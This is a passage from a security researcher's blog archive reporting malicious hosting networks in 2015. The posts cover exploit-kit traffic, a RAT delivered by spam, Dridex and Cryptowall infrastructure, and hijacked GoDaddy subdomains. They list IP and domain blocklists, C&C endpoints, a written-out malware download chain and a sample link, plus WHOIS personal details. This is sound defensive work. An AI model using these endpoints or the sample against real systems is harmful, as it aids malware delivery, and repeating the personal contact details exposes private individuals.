Sponsored by..

Showing posts with label Evil Network. Show all posts
Showing posts with label Evil Network. Show all posts

Monday 21 September 2015

Tainted Network: "kfc.i.illuminationes.com/snitch" and VPS Hosting of Latvia (91.226.32.0/23)

I've been seeing some injection attacks since last week utilising hosting services of VPS Hosting in Latvia. These are continuing today, with attacks like this one [URLquery] which sends traffic to:

[donotclick]kfc.i.illuminationes.com/snitch

This is hosted on 91.226.33.54. The exploit is not clear at this point, but some sources say that this is some sort of TDS kit. The URLquery transaction flowchart shows the attack in action.


The injected script sends the keywords and referring site upstream, for example:

[donotcliick]kfc.i.illuminationes.com/snitch?default_keyword=Team%20Tyra%20%7C%20The%20most%20popular%20equestrian%20website%20in%20Sweden%2FEurope&referrer=&se_referrer=&source=www.teamtyra.se
Although the attacks in the past few days only seem to have utilised 91.226.33.54, an analysis of the netblock [pastebin] shows several bad or spammy sites in 91.226.32.0/23, so my recommendation is that you banish this range from your network.

UPDATE:
ZScaler are also tracking their infection, an analysis of what it does can be found here.

Monday 7 September 2015

Something evil on 184.105.163.192/26 / White Falcon Communications / Dmitry Glazyrin

So.. I spotted some Nuclear EK (or some other Flash exploit) traffic on our network which attracted my interest. The IP in question was 184.105.163.243 hosted on what appears to be a Hurricane Electric IP. Personally, I don't tend to see a lot of bad stuff on HE so I looked more closely at the IP WHOIS and saw it was part of a range 184.105.163.192/26 suballocated to:

contact:ID;I:POC-DC-1258
contact:Auth-Area:contacts
contact:Class-Name:contact
contact:Name:Dmitry Glazyrin
contact:Company:White Falcon Communications
contact:Street-Address:3-758 Riverside Dr
contact:City:Port Coquitlam
contact:Province:BC
contact:Postal-Code:V3B 7V8
contact:Country-Code:CA
contact:Phone:+1-510-580-4100


The next step was to query the range using DNSDB to see what has been hosted there. This came back with several thousand sites that have been hosted there in the past, the following of which are still hosted in the 184.105.163.192/26 range now..

bilettver.ru
ituslugi-ekb.ru
kerept.ru
porno-gt.com
pornosup.com
redkrab.com
vgubki.com
erotubik.com
autowagen.ru
decoitalcolor.ru
jimbobox.ru
kr-enot.ru
alemanas.ru
dynamo-energia.ru
master-lesa.ru
kinoprosmotra.net
multi-torrent.com
pl-games.ru
voyeur-hard.com
fishemania.com
learnigo.ru
qazashki.net
surfus.ru
mysuppadomainname.gq
kinoprosmotrov.net
multtracker.com
kyricabgr.tk
onlyhdporno.com
stat-irc.tk
white-wolves.tk
blondescript.com
dc-dcbcf352.hotvideocentral.com
wishfishworld.com
5ka.info
igro-baza1.ru
igro-baza2.ru
igro-baza3.ru
igro-baza4.ru
igro-baza5.ru
kinorelizov.net
torrent-mult.com
trailer-games.ru
vvpvv10.ru
vvpvv9.ru
todoke.ru
glazikvovana.cf
glazikvovana.ga
glazikvovana.gq
glazikvovana.ml
glazikvovana.tk
glazikvovki.cf
glazikvovki.ga
glazikvovki.gq
glazikvovki.ml
glazikvovki.tk
popochkavovana.cf
popochkavovana.ga
popochkavovana.gq
popochkavovana.ml
popochkavovana.tk
popochkavovki.cf
popochkavovki.ga
popochkavovki.gq
popochkavovki.ml
popochkavovki.tk
resnichkavovana.cf
resnichkavovana.ga
resnichkavovana.gq
resnichkavovana.ml
resnichkavovana.tk
resnichkavovki.cf
resnichkavovki.ga
resnichkavovki.gq
resnichkavovki.ml
resnichkavovki.tk
samaragss.ru
wechkavovana.cf
wechkavovana.ga
wechkavovana.gq
wechkavovana.ml
wechkavovana.tk
wechkavovki.cf
wechkavovki.ga
wechkavovki.gq
wechkavovki.ml
wechkavovki.tk
zalypkavovana.ml
zalypkavovana.tk

zalypkavovki.cf
zalypkavovki.ga
zalypkavovki.gq
zalypkavovki.ml
zalypkavovki.tk
zybikvovana.cf
zybikvovana.ga
zybikvovana.gq
zybikvovana.ml
zybikvovana.tk
zybikvovki.cf
zybikvovki.ga
zybikvovki.gq
zybikvovki.ml
zybikvovki.tk
staffrc.com
stopudof.com
35igr.ru
adandc.ru
avgyst.ru
comedy24.ru
e7ya.ru
funrussia.ru
ladykafe.ru
med-cafe.ru
mykazantip.ru
ohotaforum.ru
powerpoint-ppt.ru
sibledy.ru
turistvip.ru
ya-pisatel.ru
kypitest.ru
anykadavai.tk
forwarditaly.org
getyourimesh.com
mymobi.ml
yellowfrance.org

Sites that are flagged as malware by Google are highlighted and these are all hosted on 184.105.163.243. But what was interesting was what White Falcon Communications have been hosting in the past. When I ran the entirety of all the sites from DNSDB through my checker, I got some interesting results* [csv].

Out of 2867 sites analysed, 1973 (69%) sites had either hosted malware or were spammy. Some of the unrated sites are clearly phishing sites (e.g. usabanksecurity.com). Although these sites are not hosted on White Falcon Communications IPs now, they all have been at some point in the past.

So, who is this outfit? Well, it didn't take to come up with a couple of news stories, firstly this one where White Falcon had been raided by police in Canada in connection with C2 infrastructure for the Citadel botnet. That was followed by this story where White Falcon was allegedly suing law enforcement back, due to alleged "negligence".

However, given the sheer volume of crap that White Falcon has hosted in the past and its current problem with exploit kits, I would definitely recommend blocking traffic to 184.105.163.192/26 to be on the safe side.

* fields are domain name, current IP address, MyWOT ratings, Google Safebrowsing rating, SURBL status.

Friday 24 July 2015

Evil network: Malicious RATs (including milano.exe) on 185.19.85.128/26 (Datawire AG)

There's more to this spam than meets the eye:

From:    wholesale.uganda@anisuma.com
To:    "tariq@paramountdistributors.com" [wholesale.uganda@anisuma.com]
Date:    24 July 2015 at 13:31
Subject:    re:invoice

Attention
Please confirm your consignee name and address on the BL
http://a.pomf.se/cvpkgu.rar
please let update me
thanks 
"Anisuma Traders" is the name of a legitimate trading corporation with operations in several African countries, although they are not sending the spam. It looks like a phish, right? Wrong..

The apparent link to a .rar file caught my eye. In fact, the download location is not pomf.se (a defunct Swedish site) but the click chain goes like this:

http://ge.tt/api/1/files/1XjW10L2/0/blob?download
http://api.ge.tt/1/files/1XjW10L2/0/blob?download
http://ec2-54-155-123-115.eu-west-1.compute.amazonaws.com:9009/streams/1XjW10L2/stu.rar?sig=-U7AIHwQKNyk4BP6A2uOe9UYEFBYCm3SADo&type=download

The file downloaded is stu.rar which in turn contains an executable milano.exe. I'm going to take a guess and suggest that this is a Very Bad File, although the VirusTotal report give a detection rate of just 1/55 with McAfee flagging it as "BehavesLike.Win32.BackdoorNJRat.gc"

Both the Malwr and Hybrid Analysis reports show that it hooks into the OS and attempts to avoid detection. Crucially, they both show network traffic to gee.duia.eu on 185.19.85.138 (Datawire, Switzerland).

So, McAfee thinks this is a RAT and there's suspect network traffic, but what do the email headers tell us?
Received: from mail.anisuma.com (mail.jackys.com [83.111.201.118])
    (using TLSv1 with cipher AES128-SHA (128/128 bits))
    (No client certificate requested)
    by [redacted] (Postfix) with ESMTPS id A8CE2AF548
    for [redacted]; Fri, 24 Jul 2015 12:32:29 +0000 (UTC)
Received: from [10.85.138.34] by mail.jackys.com (Cipher TLSv1:-SHA:128) (MDaemon PRO v12.5.3)
    with ESMTP id md50009556350.msg
    for [redacted]; Fri, 24 Jul 2015 16:33:59 +0400
X-Spam-Processed: mail.jackys.com, Fri, 24 Jul 2015 16:33:59 +0400
    (not processed: message from trusted or authenticated source)
X-MDRemoteIP: 185.19.85.138
X-Return-Path: prvs=164718a849=wholesale.uganda@anisuma.com
X-Envelope-From: wholesale.uganda@anisuma.com
X-MDaemon-Deliver-To: [redacted]
Content-Type: multipart/alternative; boundary="===============0415218432=="
MIME-Version: 1.0
Subject: re:invoice
To: "tariq@paramountdistributors.com" <wholesale.uganda@anisuma.com>
From: wholesale.uganda@anisuma.com
Date: Fri, 24 Jul 2015 13:31:09 +0100
The "X-MDRemoteIP" header shows that the email originates from the same server it is phoning home to. This is unusual because most spam these days come from botnets, and if the originating server gets shut down for spam then the infected clients won't be able to phone home. The email routes through servers belong to jackys.com in the UAE, perhaps indicating that someone has altered their systems to allow the malicious traffic to route through.

185.19.85.138 is therefore a server of interest, but a quick look at the IP and the neighbourhood indicate that this isn't just a single popped server.. there are 58 IPs hosting what appears to be malicious data (listed at the end) taking up the entire 185.19.85.128/26 range.

I'm betting that renting a /26 slice of Swiss servers isn't cheap.

Out of all the malicious domains (listed at the end of the post), one stands out boss.milano22.com (because the binary is named milano.exe). That is related to this malware, but the WHOIS details reveal no clues.

Another one that also caught my eye because it is multihomed on so many IPs is zexio.no-ip.biz which is related to this malware from 2012 which is variously identified as Shakblades and/or Blackshades, both illicit RAT tools.

Looking at various other domains shows that they are connected with other malicious activity over the past two years or so. What that means is that this operation is not only big, but has been going on for some time.

For research purposes, a copy of the malware is here (Zip file, password=infected)

Personally, I would recommend that you block all dynamic DNS domains on a corporate network, and combined with the other potentially malicious domains gives the following recommended blocklist:

185.19.85.128/26
a5b4c3d2e1.com
3utilities.com
blogsyte.com
brasilia.me
chickenkiller.com
craftx.biz
ddns.me
ddns.net
dnsiskinky.com
duia.eu
dvrcam.info
eating-organic.net
game-server.cc
game-host.org
geekgalaxy.com
gotdns.com
homeip.net
isa-geek.net
glory297.org
hopto.org
linkpc.net
milano22.com
minecraftnoob.com
mlbfan.org
no-ip.biz
no-ip.info
no-ip.org
noip.me
noip.us
redirectme.net
serveblog.net
serveftp.com
sytes.net
zapto.org
zicoyanky.pw

Malicious IPs:
185.19.85.133
185.19.85.134
185.19.85.135
185.19.85.136
185.19.85.137
185.19.85.138
185.19.85.139
185.19.85.140
185.19.85.141
185.19.85.142
185.19.85.143
185.19.85.144
185.19.85.145
185.19.85.146
185.19.85.147
185.19.85.148
185.19.85.149
185.19.85.150
185.19.85.151
185.19.85.152
185.19.85.153
185.19.85.154
185.19.85.155
185.19.85.156
185.19.85.157
185.19.85.158
185.19.85.159
185.19.85.160
185.19.85.161
185.19.85.162
185.19.85.163
185.19.85.164
185.19.85.165
185.19.85.166
185.19.85.167
185.19.85.168
185.19.85.169
185.19.85.170
185.19.85.171
185.19.85.172
185.19.85.173
185.19.85.174
185.19.85.175
185.19.85.176
185.19.85.177
185.19.85.178
185.19.85.179
185.19.85.180
185.19.85.181
185.19.85.182
185.19.85.183
185.19.85.184
185.19.85.185
185.19.85.186
185.19.85.187
185.19.85.188
185.19.85.189
185.19.85.190

Malicious domains:
fort.ugo10.minecraftnoob.com
mtxcg.craftx.biz
6306921.no-ip.biz
1mathieucg.no-ip.biz
artengo.no-ip.biz
asawakath.no-ip.biz
asrxxx.no-ip.biz
bluemountain55.no-ip.biz
bluntmosphere.no-ip.biz
businessdb04.no-ip.biz
charssi693.no-ip.biz
chobitsshocks.no-ip.biz
daniel123k.no-ip.biz
debug.no-ip.biz
divin32.no-ip.biz
donkriss101.no-ip.biz
draynet1.no-ip.biz
fatal889321.no-ip.biz
freebandz.no-ip.biz
freeyou2014.no-ip.biz
gptman5.no-ip.biz
gptmanster5.no-ip.biz
ian1954.no-ip.biz
icediamant.no-ip.biz
ikemello.no-ip.biz
infosearch898.no-ip.biz
itisnotreal.no-ip.biz
jskvikel.no-ip.biz
kobsrat.no-ip.biz
lizzykane.no-ip.biz
lolwot.no-ip.biz
maicol.no-ip.biz
michael8776.no-ip.biz
miker790.no-ip.biz
milano22.no-ip.biz
mortexmutex.no-ip.biz
natilexx.no-ip.biz
nonysa.no-ip.biz
oezeokobe1.no-ip.biz
oneprouddad.no-ip.biz
rumberocalle.no-ip.biz
serenity786.no-ip.biz
sm3351.no-ip.biz
sslcertificates.no-ip.biz
stroperjilles.no-ip.biz
update28459.no-ip.biz
uzolion.no-ip.biz
windowsupdate995.no-ip.biz
wizard2002.no-ip.biz
wowyougotme.no-ip.biz
wuwksterboss.no-ip.biz
zexio.no-ip.biz
new.game-server.cc
nnicrosoft.3utilities.com
obinnabio.blogsyte.com
joeban.chickenkiller.com
ceedata.dnsiskinky.com
bio4kobs.geekgalaxy.com
kan3.gotdns.com
boss.milano22.com
microsoftcorp.serveftp.com
shadybiodata.dvrcam.info
izimother.no-ip.info
lopta10.no-ip.info
nzvat.no-ip.info
test13.no-ip.info
biodataczar.brasilia.me
streetdesciple.ddns.me
austinrat.noip.me
marct2702.noip.me
bigtoby35.ddns.net
businessdb00.ddns.net
layziebone009.ddns.net
mikey0147.ddns.net
cagbbio.eating-organic.net
new.homeip.net
pcuser.homeip.net
updated.homeip.net
spynet.homelinux.net
microdude.isa-geek.net
akconsult.linkpc.net
enitan.linkpc.net
server23.redirectme.net
serialcheck55.serveblog.net
obasanjo.sytes.net
sadsix.sytes.net
window.sytes.net
internet.game-host.org
coza.glory297.org
makingpay.hopto.org
tudorsdetails.mlbfan.org
ayool.no-ip.org
ayool1.no-ip.org
ayool2.no-ip.org
beastyyou.no-ip.org
business11.no-ip.org
chuks052.no-ip.org
cryptoesel.no-ip.org
dextercom.no-ip.org
divin32.no-ip.org
doingit108.no-ip.org
fazbar2013.no-ip.org
frankspecht.no-ip.org
immo506.no-ip.org
immo886.no-ip.org
jackro.no-ip.org
lizzykane.no-ip.org
micheal4fingax-07.no-ip.org
milano99.no-ip.org
morechedder.no-ip.org
mywaylife.no-ip.org
orangeroom.no-ip.org
papakamsi4moni7.no-ip.org
spongebob30.no-ip.org
ukon.no-ip.org
win7test.no-ip.org
zenithsales.no-ip.org
0tazbox.zapto.org
bellwiz2.zapto.org
bluemountain.zapto.org
bluemountain66.zapto.org
client.zapto.org
hessu.zapto.org
hessubs.zapto.org
izilife.zapto.org
sadsix.zapto.org
tazbox.zapto.org
tinubu.zapto.org
win7test.zapto.org
x631.zapto.org
xecuter.zapto.org
xecuter2.zapto.org
www.zicoyanky.pw
twitch.noip.us
a5b4c3d2e1.com
gee.duia.eu

Friday 20 March 2015

Something evil on 85.143.216.102 and 94.242.205.101

I will confess that I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on 94.242.205.101 (root SA, Luxembourg) [VT report] being reached via 85.143.216.102 (AirISP, Russia) [VT report].

Whatever it is, it is using subdomains from hijacked GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs:

dchsleep.com
manymike.com
vladeasa.com
ezdockparts.com
suurtampere.com
visikreatif.com
josemiguelez.com
reformapenal.com
axwaydropzone.com
capitolskopje.com
theantennapub.com
faceofsustengo.com
niagarajournal.com
crystalbeachhill.com
ezdockadirondacks.com
ezdockfingerlakes.com
chambel.info
lidifaria.info
ewwebinars.co
cybercoaching.co
ewwebinars.com
eyouthcounseling.com
ecounselingnation.com
epastoralcounseling.com
extraordinaryfamilies.com
drtim.net
drclinton.net
ewomencast.net
ecounseling.net
drtimclinton.net
ecouplecounseling.net
biblicalcoachingtoday.net
drclinton.org

For practical purposes though I recommend you block traffic to the IPs rather than the domains.

Recommended blocklist:
85.143.216.102
94.242.205.101

UPDATE:
These following nearby IPs have also been distributing badness. I recommend you block these too:
85.143.216.103
94.242.205.98

Tuesday 17 February 2015

Something evil on 92.63.88.0/24 (MWTV, Latvia)

I've been tracking Dridex for some time, and I keep seeing IPs for MWTV in Latvia cropping up. So far I have seen:

92.63.88.87
92.63.88.97
92.63.88.100
92.63.88.105
92.63.88.106
92.63.88.108

I'm not sure how widely this spreads through the MWTV network, but I would certainly recommend blocking 92.63.88.0/24 on your network perimeter.

Friday 13 February 2015

Something evil on 95.163.121.0/24 (Digital Network JSC / com4tel.ru / cloudavt.com)

I've written about DINETHOSTING aka Digital Network JSC many times before, and frankly their entire IP range is a sea of crap, and I have a whole load of blocks in the 95.163.64.0/18 range (including the entirity of 95.163.64.0/10). This latest sea of badness seems to be suballocated to a customer using the 95.163.121.0/24 block.

inetnum:        95.163.121.0 - 95.163.121.255
netname:        RU-CLOUDAVT-NET
descr:          LLC ABT Cloud Network
country:        RU
admin-c:        PPP9992-RIPE
tech-c:         PPP9992-RIPE
status:         ASSIGNED PA
mnt-by:         DN-MNT
changed:        ncc@msm.ru 20150213
source:         RIPE

person:         Andrey Tkachenko
address:        107589, Russia Moscow street Khabarovsk 4A
e-mail:         cc-it@com4tel.ru
phone:          +7 916 626 7798
fax-no:         +7 916 626 7798
nic-hdl:        PPP9992-RIPE
abuse-mailbox:  info@cloudavt.com
mnt-by:         DN-MNT
changed:        noc@msm.ru 20140429
source:         RIPE

route:          95.163.64.0/18
descr:          Digital Network JSC
descr:          Moscow, Russia
descr:          http://www.msm.ru
descr:          aggregate prefix
origin:         AS12695
mnt-by:         DN-MNT
changed:        noc@msm.ru 20121129
source:         RIPE
Tools


Just looking at blog posts, I can see badness occurring in the recent past on the following IPs:
95.163.121.71 [1]
95.163.121.72 [2]
95.163.121.188 [3]
95.163.121.216 [4]
95.163.121.217 [5]

That's quite a high concentration of bad servers in a relatively small block. A quick look at what is currently hosted indicates (in my personal opinion) nothing of value, and I would recommend blocking the entire 95.163.121.0/24 range as a precaution.

Friday 6 February 2015

Something evil on 5.196.143.0/28 and 5.196.141.24/29 (verelox.com)

This quite interesting blog post from Cyphort got me digging into that part of the infection chain using nonsense .eu domains. It uncovered a whole series of IPs and domains that have been used to spread Cryptowall (possibly other malware too), hosted in the 5.196.143.0/28 and 5.196.141.24/29 ranges (and possibly more).

These are OVH IP ranges, suballocated to a customer called Verelox.com. I think that Verelox is a legitimate but very small web host that has suffered a major compromise of their servers.

The first range is 5.196.141.24/29 which has apparently compromised servers at:
 
5.196.141.24
5.196.141.25
5.196.141.26
5.196.141.27

..you can see a dump of probably evil domains in this pastebin. The second range is 5.196.143.0/28 with apparently compromised servers at:

5.196.143.3
5.196.143.4
5.196.143.5
5.196.143.6
5.196.143.7
5.196.143.8
5.196.143.10
5.196.143.11
5.196.143.12
5.196.143.13

..you can see a list of those domains in this pastebin

Registration details of the domains vary, including some that use the somewhat amusing email address reach4keys@gmail.com. Some of the .eu domains and the .xyz domains have contact details as follows:

Registrant ID: INTE54fjkzffmcv1
Registrant Name: Ramil Jamaletdinov
Registrant Organization:
Registrant Street: Bolshaya str, 15, kv.12
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 105553
Registrant Country: RU
Registrant Phone: +7.90988766754
Registrant Phone Ext:
Registrant Fax: +7.
Registrant Fax Ext:
Registrant Email: jramil889@gmail.com


I don't know if this person actually exists or indeed has anything to do with this, all searches come up blank.

In addition to this, some of these domains use nameservers on the following IP addresses:

168.235.70.106
168.235.69.219


These are allocated to Ramnode LLC in the US. I would suggest that they are under the control of the bad guys and are worth blocking traffic to.

Note that Cyphort identift these C&C servers for the malware:
asthalproperties.com:4444
pratikconsultancy.com:8080

The following IPs and domain names all seem to be connected and I would recommend blocking at least the IP addresses and domains in bold (the other domains look like they are probably throwaway ones):

5.196.143.0/28
5.196.141.24/29
168.235.69.219
168.235.70.106

asthalproperties.com
pratikconsultancy.com

2hk7.eu
8m3a.eu
aaawq1.eu
aaawq2.eu
aaawq3.eu
asoooe1.eu
asoooe2.eu
asoooe3.eu
asw1.eu
asw2.eu
asw3.eu
bilipa.eu
bimbino.eu
bindarov.eu
c4c7.eu
cemtro3.eu
demotikvk.eu
dnor1.eu
dnor2.eu
dnor3.eu
efrai1.eu
efrai2.eu
fesvom.eu
fliston.eu
g19f.eu
gerww3.eu
giuyt5.eu
giuyt6.eu
grannu1.eu
gremn2.eu
gremn3.eu
gyyf.eu
happer1.eu
happer2.eu
happer3.eu
happer4.eu
happer5.eu
happer6.eu
hewoq5.eu
hewoq6.eu
hrt1.eu
hrt2.eu
huayolo.eu
joybul.eu
kalinda.eu
manike.eu
nicjaa5.eu
nicjaa6.eu
ponrel.eu
sindy5.eu
slanecom.eu
slawq2.eu
solonecem.eu
timona.eu
volosq.eu
vvyyyx.eu
kreni.xyz
slanecom.xyz
solonecem.xyz



Thursday 8 January 2015

Persistent hijacked GoDaddy domains serve malware via Turkish IPs

Last year I wrote about a small bunch of IPs belonging to Radore Veri Merkezi Hizmetleri A.S in Turkey that seemed to be aggressively pushing an exploit kit via hijacked GoDaddy domains. Today I was slightly surprised to see that this is still going on, and in some cases using the same domains as they were all those months ago.

Let's start by looking at an example hijacked domain gssportspics.com which is a neat little site with some high school photos of sports and events on.


We can look up the DNS details for www.gssportspics.com and they look OK with an IP of 184.168.152.5 which belongs to GoDaddy.

01/08/15 14:06:28 dns www.gssportspics.com
Mail for www.gssportspics.com is handled by smtp.secureserver.net mailstore1.secureserver.net
Canonical name: gssportspics.com
Aliases:
  www.gssportspics.com
Addresses:
  184.168.152.5


The domain is registered by GoDaddy, the domain is hosted by GoDaddy. Makes sense, and the website is clean of malware as far as I can tell.

But the problem is that there are a whole bunch of subdomains also using the gssportspics.com that you can't easily tell are there. For example, these subdomains all exist too:

invu.gssportspics.com
yossi.gssportspics.com
auckle.gssportspics.com
sively.gssportspics.com
truset.gssportspics.com
vishal.gssportspics.com
sovieana.gssportspics.com
wiramart.gssportspics.com
gardenhour.gssportspics.com
spechtling.gssportspics.com

Let's look up one of these..

01/08/15 14:24:45 dns vishal.gssportspics.com
Canonical name: vishal.gssportspics.com
Addresses:
  31.210.96.158


Well, that IP address ain't GoDaddy.

inetnum:        31.210.64.0 - 31.210.127.255
netname:        TR-RADORE-20110504
descr:          Radore Veri Merkezi Hizmetleri A.S.
country:        TR
org:            ORG-RHTH1-RIPE
admin-c:        RLA11-RIPE
tech-c:         RLA11-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      RADORE-MNT
mnt-routes:     RADORE-MNT
mnt-domains:    RADORE-MNT
notify:         registry@rh.com.tr
changed:        hostmaster@ripe.net 20110504
changed:        hostmaster@ripe.net 20130410
changed:        bit-bucket@ripe.net 20130930
source:         RIPE


Well, we've been here before and I can tell you that these sort of hijacked sites are hosted on the following IPs:

31.210.96.155
31.210.96.156
31.210.96.157
31.210.96.158


I don't know how this Turkish host suballocates IPs to customers, but it is roughly equivalent to 31.210.96.152/29.

So how are these hijacks happening? Actually, I don't know although I do know that this is very common with GoDaddy accounts that use domaincontrol.com namservers. Perhaps the accounts are being phished, hit in an XSS attack or there is a weakness in GoDaddy's DNS architecture. GoDaddy are normally very good at cleaning this sort of thing up, so let's hope they can put a stop to this now.

What the exact payload of these IPs is I don't know because it is hardened against analysis, but they have hosted Ponmocup in the past.  I have observed traffic being sent to these server via hacked sites, and given the subdomain hijacking then it is clear that something very bad is going on. You can see an example of URLquery failing to analyse one of these sites here.. I suspect that the payload only works once per visiting IP.

You can see an example of some of the LIVE subdomains hosted on these IPs here [pastebin] or a full list of ALL the hijacked subdomains that I seen over time in this range here.

Currently, these following domains all have hijacked subdomains, as far as I can tell, they are all legitimate sites and I would hesitate to block them.. instead I would recommend blocking the IP address ranges listed above instead.

21ideas.com
2cuonline.com
4runnerliftkits.com
8jutawan.com
aabathlifts.com
adventureresponsibly.com
advertisementdevil.com
advertisewiththedevil.com
aesirholdings.com
agentonpoint.com
ahtcna.com
alhogames.com
alisonleese.com
allknowingpsychic.com
alloyfurnacerolls.com
alloymuffles.com
alloyradianttubes.com
allprodelta.com
alternateolympics.com
alternativeolympics.com
ancestorworshippublishing.com
animalgenetics.com
antonzuponcic.com
arc4g.com
aredietsok.com
aredietsokay.com
assistlist.com
asstimate.net
atvguidebooks.com
atv-guidebooks.com
atvtrailguides.com
autoeventregistration.com
automotiveeventregistration.com
automotiveservicesavings.com
autoserviceevent.com
aylesburyironing.com
azproremodelers.com
bahenasteel.com
bakecakesnow.com
basslakeshagclub.com
be3ny.com
benahavisrealestate.com
berkshirecapitalholdings.com
bestsilvercufflinks.com
bgtoledorent.com
birdsexingkit.com
blingmatters.com
blurlight.com
boeckman.net
breastimate.com
bridgenations.com
bristolblog.com
bristolwatch.com
bumperstickerpatriots.com
buybackmyvehicle.com
buynewaz.com
buynowbuynewaz.com
bvvk.com
canadianpilotcars.com
caninecolorgenetics.com
caninepaternitytesting.com
caseybassett.com
castlelawpa.com
caytechpools.com
charlesawells.com
chrisvessey.com
ciunev.com
concretevibration.com
connecteli.com
connectmetv.com
consul-tec.com
consumerdevil.com
cruzeonover.com
custom-chocolate-favors.com
customerdevil.com
dealerholidayevent.com
deespilotcars.com
defeattheliberalmedia.com
deliveredbythedevil.com
devilforacause.com
devilwithacause.com
dkshealth.com
drinkbluphoria.com
drinkcalories.net
drjaneaxelrod.com
dropoutgobig.com
dunstablekitchens.com
eaglepocatello.com
effectsllc.com
egunt.com
ellagphotography.com
empowerprinciples.com
engpua.com
enhancementlasers.com
enhancinglasers.com
equinepaternitytesting.com
exceltoner.com
exceltoners.com
facenewbook.com
fantasticfountain.com
fathersnsons.com
fatlosstoolkit.com
felixtreitler.com
feltedfibers.com
fighttheliberalmedia.com
fortheloveofgadgets.com
frankryn.com
freegascardregistration.com
fubarpaintball.com
funtrecks.net
funtreks.net
funtrekspublishing.com
gee-wizsolutions.com
getpaid365days.com
gillspools.com
girlsgoneglamis.com
gliscastings.net
gliscentrifugal.com
glisfabrications.com
glisinc.com
golfironworks.com
golfnewsalaska.com
golfnewsarkansas.com
golfnewscolorado.com
golfnewsconnecticut.com
golfnewsdelaware.com
golfnewsgeorgia.com
golfnewsidaho.com
golfnewsillinois.com
golfnewsindiana.com
golfnewsiowa.com
golfnewskansas.com
golfnewskentucky.com
golfnewslouisiana.com
golfnewsmaine.com
golfnewsmaryland.com
golfnewsmassachusetts.com
golfnewsmississippi.com
golfnewsmissouri.com
golfnewsmontana.com
golfnewsnebraska.com
golfnewsnewengland.com
golfnewsnewhampshire.com
golfnewsnewjersey.com
golfnewsnewmexico.com
golfnewsnewyork.com
golfnewsnorthcarolina.com
golfnewsnorthdakota.com
golfnewsohio.com
golfnewsoklahoma.com
golfnewspennsylvania.com
golfnewsrhodeisland.com
golfnewssouthcarolina.com
golfnewssouthdakota.com
golfnewstennessee.com
golfnewsutah.com
golfnewsvermont.com
golfnewsvirginia.com
golfnewswestvirginia.com
golfnewswisconsin.com
golfnewswyoming.com
grafikcase.com
grafikdevils.com
grafik-devils.com
grafik-skins.com
greatserviceforless.com
greatsoundevents.com
gregorylknox.com
grupa-kim.com
gryphonaz.com
gryphoncompanies.com
gryphonus.com
gssportspics.com
haosjer.com
hartford-capital.com
hbacagreenproremodelers.com
hbacaproremodelers.com
heattreatalloy.com
historyhobbybooks.com
hockeydoneright.com
hugesavingsevent.com
humphreyslawncare.com
icecreamtruckuniversity.com
imokh.com
inboccaproductions.com
inkandtonersale.com
integratedpipe.com
italy-in-bocca.com
javaemulator.com
jmydesign.com
joannheilman.com
joeamericashow.com
joechenphoto.com
jsjenterprises.com
juddnelsonstudios.com
kaitlinsplayground.com
kevindonnellymd.com
knoxkomputerservice.com
kokobon.com
ksupride.com
ksupridewrestling.com
ksuwrestling.net
lakehousetimberranch.com
laser-enhancements.com
laserhairenhancement.com
launchyourline.com
learningoverip.com
leashyourcamera.com
lendmecash.com
letseatinitaly.com
lifestylology.com
lindseytoothman.com
lionizetheworld.com
lionizeyourself.com
lions-mark.com
lovetoner.com
lovetoners.com
lsclinks.com
lusitanogold.com
makingwaves-salon.com
mangiamoinitalia.com
mangiamoneicantucci.com
mapclimber.com
matthewstarner.com
maxscenesdesign.com
mdmofgeorgia.com
memorialdaysavingsevent.com
mendezign.com
metoly.com
micksher.com
middlefieldma.net
midnightastronomy.com
mikemcmortgage.com
miracline.com
momsagainstmercury.com
monizarealty.com
mrsstyleseeker.com
mwhiteman.com
myabadi.com
mycameraleash.com
myfuturephysique.com
mystagingbox.com
my-ui.com
nacprint.com
newcarsat.com
newlogiq.com
newworldheroes.com
ngage-games.com
nitplus.com
nutritionbydesign.com
ny007ny.com
oharvest.net
omarker.net
omobia.com
onlybetterdeal.com
organixharvest.com
ozarkmountain4x4club.com
palermolundahl.com
pamsdogacademy.com
pamsdogtraining.com
panjiaying.com
panochevalleysolar.com
paulguardino.com
paxamericanaspirits.com
peekaboopumpkin.com
pennyappleapparel.com
pinkdollaratm.com
powerplaycreative.com
prestigehonda.net
propertiespain.com
qualitycomforthomeservices.com
realdealpsychic.com
registerforautoevent.com
reikisolar.com
remodelgreaterphoenix.com
renzograciemexico.com
restoremystuff.com
revolvertactical.net
richmondguitarx.com
rled.net
roaringlion.com
roaringlionenergydrink.com
savedalyfield.com
searchtrusted.com
secrettomb.com
sellitandforgetitnow.com
sellitandforgetittoday.com
shamrocksmokrz.com
shynlaw.com
signaturetoner.com
signaturetoners.com
skyviewphoto.com
slyforkfarm.com
snuffbottleworld.net
softmn.com
southvalleyrugby.com
specialpsychic.com
sportdoneright.com
springcleaningevent.com
squeezepagecentral.com
stainlessfabrications.com
stevesenergydrink.com
strongpsychic.com
studiosylverline.com
sunblockmaterials.com
tabeer-e-pakistan.com
tacomaliftkits.com
tagdeedlingua.com
tagdeed-translation.com
tagdeed-translations.com
techsupportauctions.com
teeboxpromo.com
telecomchicago.com
telecomillinois.com
telecomindiana.com
telecommichigan.com
tfgjustsayin.net
theafternoonjoker.com
theartdepot.net
thecinema6.com
thecollegeaddressshop.com
theeveningjoker.com
thehiddencorner.com
theknowledgekingdom.com
themorningjoker.com
thenightlyjoker.com
thinkadmit.com
thisishowthisworks.com
thisweekinwhiteness.com
thomasdesgrp.com
thomasdesigngroupllc.com
timkennywebdesign.com
timothykenny.com
timsicecreamtruck.com
timsroadtrip.com
toyotaliftkits.net
toyteclifts.net
trademarkrestoration.com
trademarkrestorationinc.com
tri-swelding.com
tropicaltoner.com
tuftsclimatejustice.com
turkrdns.com
twibularity.com
usdays.com
usedcarsat.com
usedmobi.com
valentinesalesevent.com
vehicleexchangeprogram.com
vehicleservicediscount.com
virtualsofts.com
warpets.com
webrunchhard.com
wenerdhard.com
whhholdingusainc.com
whhusainc.net
whichcameratookthis.com
whybuyanewhome.com
xn--80afcbdab0arg8e4c.com
xn--h1adlaje.net
yourcakedecoratingclass.com
yourcrystalball.com
yourspartanmovers.com
zombiesurvivalaptitudetest.com
zoomtoner.com
zoopoints.com
z-sat.com



Wednesday 7 January 2015

